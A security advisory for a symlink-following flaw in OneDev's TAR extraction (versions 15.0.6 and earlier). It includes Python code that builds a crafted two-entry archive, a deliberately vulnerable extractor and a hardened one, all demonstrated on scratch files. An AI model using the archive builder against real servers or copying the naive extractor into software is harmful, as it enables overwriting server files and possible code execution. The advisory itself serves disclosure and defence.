Impact
OneDev versions 15.0.6 and earlier allow a malicious user with CI job write permissions to create, during archive extraction, symbolic links that point to absolute paths. The vulnerability arises because the TarUtils.untar() method accepts the link name from the TAR entry without validation and follows it on extraction. As a result, an archive can contain a symlink that points to an arbitrary server-side location; a subsequent file entry in the same archive is then written through that link, overwriting any file writable by the account running the OneDev server. This flaw can compromise the confidentiality or integrity of critical files and, if essential scripts or configuration files are overwritten, can lead to remote code execution. The weakness is classified as CWE-61 (UNIX Symbolic Link (Symlink) Following): the extractor follows an attacker-controlled symbolic link when it writes the next entry.
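The following is an added example, not OneDev's code, that reproduces the pattern described above in Python's tarfile module: an archive whose first entry is a symlink named "cfg" pointing at an absolute server-side path, followed by a regular-file entry with the same name. untar_naive() mirrors the flawed TarUtils.untar() behaviour (link name trusted verbatim, next entry written through it), and untar_safe() rejects absolute link targets, as the 15.0.7 fix is described as doing, and goes further by also rejecting relative link targets and write paths that resolve outside the extraction root. The entry name, the victim file "startup.sh", the payload and the scratch directories are all constructed for the demonstration.

```python
import io
import os
import tarfile
import tempfile

PAYLOAD = b"echo overwritten\n"  # constructed sample content for the demo


class UnsafeEntry(ValueError):
    """Raised by untar_safe() for an entry that would escape the extraction root."""


def build_malicious_tar(abs_target: str) -> bytes:
    """Build, in memory, the two-entry archive an attacker would upload to a CI job."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("cfg")
        link.type = tarfile.SYMTYPE
        link.linkname = abs_target          # absolute, server-side path (constructed)
        tar.addfile(link)
        data = tarfile.TarInfo("cfg")        # same name: will be written through the link
        data.size = len(PAYLOAD)
        tar.addfile(data, io.BytesIO(PAYLOAD))
    return buf.getvalue()


def untar_naive(archive: bytes, dest: str) -> None:
    """Vulnerable pattern: link name used verbatim, then followed on the next write."""
    with tarfile.open(fileobj=io.BytesIO(archive)) as tar:
        for m in tar:
            path = os.path.join(dest, m.name)
            if m.issym():
                os.symlink(m.linkname, path)
            elif m.isfile():
                with open(path, "wb") as f:  # open() follows the symlink just created
                    f.write(tar.extractfile(m).read())


def _inside(root: str, path: str) -> bool:
    """True if path, after resolving symlinks, stays within root (root is already real)."""
    real = os.path.realpath(path)
    return real == root or real.startswith(root + os.sep)


def untar_safe(archive: bytes, dest: str) -> None:
    """Hardened: reject absolute or escaping link targets and escaping write paths."""
    root = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(archive)) as tar:
        for m in tar:
            path = os.path.join(root, m.name)
            parent = os.path.dirname(path)
            if not _inside(root, parent):
                raise UnsafeEntry(f"{m.name}: parent directory escapes root")
            if m.issym():
                if os.path.isabs(m.linkname):
                    raise UnsafeEntry(f"{m.name}: absolute link target {m.linkname}")
                if not _inside(root, os.path.join(parent, m.linkname)):
                    raise UnsafeEntry(f"{m.name}: link target escapes root")
                os.symlink(m.linkname, path)
            elif m.isdir():
                os.makedirs(path, exist_ok=True)
            elif m.isfile():
                if not _inside(root, path):  # catches a write through an earlier link
                    raise UnsafeEntry(f"{m.name}: write path resolves outside root")
                os.makedirs(parent, exist_ok=True)
                with open(path, "wb") as f:
                    f.write(tar.extractfile(m).read())
            else:
                raise UnsafeEntry(f"{m.name}: unsupported entry type")


def demo() -> dict:
    """Run both extractors against a scratch 'server' file; report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "server", "startup.sh")  # constructed victim file
        os.makedirs(os.path.dirname(target))
        original = b"#!/bin/sh\necho ok\n"
        with open(target, "wb") as f:
            f.write(original)
        archive = build_malicious_tar(target)

        naive_dest = os.path.join(tmp, "job1")
        os.mkdir(naive_dest)
        untar_naive(archive, naive_dest)
        with open(target, "rb") as f:
            naive_overwrote = f.read() == PAYLOAD

        with open(target, "wb") as f:
            f.write(original)                # restore before the hardened run
        safe_dest = os.path.join(tmp, "job2")
        os.mkdir(safe_dest)
        try:
            untar_safe(archive, safe_dest)
            safe_rejected = False
        except UnsafeEntry:
            safe_rejected = True
        with open(target, "rb") as f:
            target_intact = f.read() == original
        return {"naive_overwrote": naive_overwrote,
                "safe_rejected": safe_rejected,
                "target_intact": target_intact}


if __name__ == "__main__":
    print(demo())
```

The decisive check in untar_safe() is the realpath test on the write path, not just the absolute-link test: a relative link such as "../../etc" escapes the root just as effectively, and a later entry written through any symlink is caught only if the path is resolved before open() is called.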
Affected Systems
The affected software is OneDev, described as a Git server with CI/CD, Kanban, and package management features, developed by TheOneDev. Only versions 15.0.6 and below are vulnerable. The issue was addressed in snapshot 15.0.7, which introduced checks to prevent absolute link creation during extraction. Affected users were advised to upgrade to at least 15.0.7.
Risk and Exploitability
The CVSS score of this issue is 8.3 (high severity). No EPSS score is available, so no published exploitation probability can be quoted at the moment. The vulnerability is not listed in the CISA KEV catalog. Exploitation requires only authenticated access with job write permissions, a role routinely granted to developers and contributors, so the pool of potential attackers is large. Because the exploitation path is straightforward, uploading a crafted TAR archive in a CI job, this flaw carries a high operational risk, especially in environments where job privileges are granted too liberally. Pending the upgrade to 15.0.7, review which accounts hold job write permission.
OpenCVE Enrichment